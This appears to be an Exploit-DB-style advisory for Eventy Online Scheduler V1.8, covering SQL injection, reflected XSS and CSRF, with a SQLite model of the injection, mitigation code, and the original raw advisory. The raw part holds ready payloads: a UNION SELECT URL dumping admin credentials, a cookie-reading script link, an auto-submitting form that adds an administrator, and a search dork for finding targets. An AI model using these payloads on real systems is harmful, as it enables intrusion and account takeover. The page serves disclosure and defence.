Vendor: Eventy Online Scheduler
Author: AtT4CKxT3rR0r1ST
CVSS: 8.8 (HIGH)
Vulnerability types: SQL Injection, Cross Site Scripting, Cross Site Request Forgery
CWE: 89, 79, 352
Product Name: Eventy Online Scheduler
Affected Version From: V1.8
Affected Version To: V1.8
Patch Exists: NO
Related CWE: N/A
CPE: a:calendarscripts.info:eventy_online_scheduler
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Published: 2014

Eventy Online Scheduler V1.8 - Multiple Vulnerabilities

SQL injection: /eve_event.php builds its query by concatenating the raw 'id' GET parameter into a SELECT against the events table ($T_EVENTS), so anything placed in that parameter is executed as SQL. An unauthenticated attacker can make the original WHERE clause false and append a UNION SELECT that reads arbitrary tables; the published proof of concept extracts the id, username and pass columns of the evp_admin table in a single request.

Cross-site scripting: eventy.php reflects the 'selmonth' and 'selyear' parameters into its output without HTML encoding. A crafted link therefore runs attacker-supplied JavaScript in the browser of any user who opens it, for example to read document.cookie and steal the session.

Cross-site request forgery: a_admins.php processes the POST that creates an administrator without an anti-CSRF token or any other proof that the request came from the application's own form. An attacker who gets a logged-in administrator to open a page containing an auto-submitting form aimed at a_admins.php can add an administrator account with a username and password of the attacker's choosing.
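The following is an added example (not code from the vendor or the advisory author) that models the first vulnerability in SQLite so the mechanism of the published payload can be run offline. The table name evp_events is an assumption, since the page only shows the $T_EVENTS variable; the columns and rows are constructed sample data, and the model table has three columns instead of the 23 the real payload pads to.

```python
import sqlite3

# Table name assumed here: the page only shows the $T_EVENTS variable, and the
# evp_ prefix is taken from the evp_admin table named in the payload.
T_EVENTS = "evp_events"


def build_db():
    """Constructed in-memory stand-in for the two tables involved.  The real
    events table has 23 columns (which is why the page's payload pads to 23);
    three are enough to show the mechanism."""
    db = sqlite3.connect(":memory:")
    db.executescript(
        """
        CREATE TABLE evp_events (id INTEGER, title TEXT, start TEXT);
        INSERT INTO evp_events VALUES (1, 'Staff meeting', '2014-01-06');
        CREATE TABLE evp_admin (id INTEGER, username TEXT, pass TEXT);
        INSERT INTO evp_admin VALUES (1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99');
        INSERT INTO evp_admin VALUES (2, 'editor', '098f6bcd4621d373cade4e832627b4f6');
        """
    )
    return db


def eve_event_vulnerable(db, id_param):
    """Mirrors line 15 of eve_event.php: the raw GET parameter is concatenated
    into the statement, so SQL syntax inside it is executed as SQL."""
    query = "SELECT * FROM " + T_EVENTS + " WHERE id=" + id_param
    return db.execute(query).fetchone()


def union_payload():
    """The page's payload rendered for SQLite: MySQL's group_concat(a,0x3a,b)
    becomes a || ':' || b, and the column list is padded to the model's three
    columns instead of 23.  The trick is unchanged: make the original WHERE
    false, then UNION in a row built from evp_admin."""
    return ("null and 1=2 union select 1,"
            "group_concat(id || ':' || username || ':' || pass),3 from evp_admin")


def dump_admins(db):
    """Drive the vulnerable function with the payload and parse the credential
    list that comes back in the 'title' column of the event row."""
    row = eve_event_vulnerable(db, union_payload())
    return sorted(tuple(entry.split(":")) for entry in row[1].split(","))
```

A legitimate request (id=1) returns the event row; the payload returns a row whose second column is the concatenated contents of evp_admin, which is exactly what the advisory's URL displays on the event page.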

Mitigation:

Validate the 'id' parameter of eve_event.php as an integer and pass it to the database through a prepared statement rather than string concatenation. HTML-encode 'selmonth', 'selyear' and every other reflected parameter of eventy.php at output time, in the context (attribute or element body) where they are written. Require a secret, per-session anti-CSRF token in every state-changing form, including the add-admin form handled by a_admins.php, and reject requests in which the token is missing or does not match the session. No vendor patch is recorded for V1.8, so these changes have to be applied to the installed code.
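As an added example (not the vendor's code), the three mitigations above written as small handler functions with the same inputs the vulnerable scripts take. The table layout is a constructed stand-in and the evp_events name is assumed from the evp_ prefix; session storage is modelled as a plain dict, and password hashing for the new admin record is deliberately left out as it is outside the scope of the three fixes.

```python
import hmac
import html
import re
import secrets
import sqlite3


def build_db():
    """Constructed minimal schema; evp_events is an assumed name for $T_EVENTS."""
    db = sqlite3.connect(":memory:")
    db.executescript(
        "CREATE TABLE evp_events (id INTEGER, title TEXT);"
        "INSERT INTO evp_events VALUES (1, 'Staff meeting');"
        "CREATE TABLE evp_admin (id INTEGER PRIMARY KEY, username TEXT, pass TEXT);"
    )
    return db


def get_event(db, id_param):
    """eve_event.php fix: accept only an ASCII integer, then bind it as a
    parameter.  A union-select payload never reaches the SQL parser; the
    caller should answer None with an HTTP 400."""
    if not re.fullmatch(r"[0-9]+", id_param):
        return None
    return db.execute("SELECT * FROM evp_events WHERE id=?", (int(id_param),)).fetchone()


def render_nav(selmonth, selyear):
    """eventy.php fix: encode reflected input for the HTML attribute context it
    is written into, so quotes and angle brackets cannot close the attribute."""
    return ('<input name="selmonth" value="{}"> <input name="selyear" value="{}">'
            .format(html.escape(selmonth, quote=True), html.escape(selyear, quote=True)))


def issue_csrf_token(session):
    """Store an unguessable per-session token; the admin form embeds it in a
    hidden field and the handler demands it back."""
    session["csrf_token"] = secrets.token_hex(32)
    return session["csrf_token"]


def add_admin(db, session, form):
    """a_admins.php fix: an auto-submitting cross-origin form like the advisory's
    PoC cannot read the victim's token, so the request is refused before any
    write.  Comparison is constant-time; both sides are encoded so a non-ASCII
    value cannot raise inside compare_digest."""
    expected = session.get("csrf_token", "")
    supplied = form.get("csrf_token", "")
    if not expected or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return False
    db.execute("INSERT INTO evp_admin (username, pass) VALUES (?, ?)",
               (form["username"], form["pass"]))  # hashing omitted, see lead-in
    return True


def admin_count(db):
    return db.execute("SELECT COUNT(*) FROM evp_admin").fetchone()[0]
```

The CSRF check is the one that needs care: the token must be compared against the value stored for the requesting session, not merely checked for presence, otherwise an attacker can supply a token from their own session.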

Exploit-DB raw data:

Eventy Online Scheduler V1.8 - Multiple Vulnerabilities
===================================================================

####################################################################
.:. Author         : AtT4CKxT3rR0r1ST
.:. Contact        : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com]
.:. Home           : http://www.iphobos.com/blog/
.:. Script         :
http://calendarscripts.info/event-calendar-software.html
.:. Dork           : "Powered by CalendarScripts.info"
####################################################################

[1] Sql Injection
==================
VULNERABILITY
##############
/eve_event.php (line 15-16)

$query="SELECT * FROM $T_EVENTS WHERE id=".$_GET['id'];

$event=$DB->sq($query);

#########
EXPLOIT
#########
http://site/eve_event.php?id=null+and+1=2+union+select+1,group_concat(id,0x3a,username,0x3a,pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+evp_admin


[2] Cross Site Scripting
=========================


http://site/eventy.php?next=1&selmonth=January&selyear=2014'"()%26%25<ScRiPt>prompt(document.cookie)</ScRiPt>


[3] Cross Site Request Forgery
==============================

[Add Admin]

<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="http://site/a_admins.php">
<input type="hidden" name="username" value="admin"/>
<input type="hidden" name="pass" value="admin"/>
<input type="hidden" name="add" value="1"/>
</form>
</body>
</html>


####################################################################